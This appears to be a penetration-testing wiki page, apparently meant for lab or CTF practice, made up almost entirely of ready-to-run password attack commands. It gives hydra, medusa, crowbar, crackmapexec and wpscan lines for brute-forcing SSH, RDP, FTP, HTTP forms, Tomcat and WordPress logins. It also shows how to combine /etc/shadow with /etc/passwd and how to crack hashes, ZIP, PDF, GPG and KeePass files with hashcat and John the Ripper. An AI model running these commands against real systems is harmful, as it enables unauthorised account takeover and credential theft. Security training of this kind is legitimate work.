Password Cracking

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.

Brute Force

Medusa

medusa -h <IP> -u <username> -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Tomcat GET:

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/html

RDP:

crowbar -b rdp -s <IP> -u <username> -C rockyou.txt -n 1

Evil-winrm:

 crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txt

SSH:

hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s <port>
hydra -l <username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -V

HTTP-GET

hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>

HTTP-POST

hydra <IP> http-form-post <"/form/frontpage.php:user=<username>&pass=^PASS^:INVALID LOGIN"> -l <username> -P /usr/share/wordlists/rockyou.txt -vV -f

hydra <IP> http-form-post <"/form/frontpage.php:user=^USER^&pass=^PASS^:INVALID LOGIN"> -L users.txt -P /usr/share/wordlists/rockyou.txt -vV -f

FTP

hydra -l <username> -P /usr/share/wordlists/rockyou.txt -vV <IP> ftp

ZIP

fcrackzip -v -u -b -D -p /usr/share/wordlists/rockyou.txt secrets.zip

Unshadow

/etc/shadow + /etc/passwd
# Grab both and do the following command
    unshadow <passwd file> <shadow file> > unshadowed.txt

WordPress

wpscan --url <IP> -U users.txt -P pass.txt
wpscan --url http://test.com/

ASC

gpg2john tryhackme.asc > hash
john hash -w=/usr/share/wordlists/rockyou.txt
gpg —import tryhackme.asc # Enter the passphrase
gpg —decrypt credentials.pgp

HashCrack

Hash Finder

hashid <hash value>
hash-identifier
haiti 'hash' # Gives hashcat ID as well

Hashcat

Find Hash ID:
 hashcat -h | grep -i <hash type>

Start Cracking:
 hashcat -m <ID> 'hash' /usr/share/wordlists/rockyou.txt --force
 hashcat 'hash' -show

 hashcat -m <ID> <hash.txt> /usr/share/wordlists/rockyou.txt --force
 hashcat <hash.txt> -show

John the Ripper (Windows hashes)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT # Rules

John the Ripper (Linux hashes)

-> First combine shadow and password and use a tool called unshadow.
        unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
        john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

PDF or ZIP

# Cracking the hash of PDF
    pdf2john test.pdf > hash 
OR
    zip2john test.zip > hash

# Cracking the hash that was found
    john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keepass Databases (.kdbx)

After getting some .kdbx file
 keepass2john Database.kdbx > keepass.hash
 john --wordlist=rockyou.txt keepass.hash

Open the database with: keepass2 Database.kdbx

PreviousUser Creation NextUsing custom wordlists

Last updated 4 months ago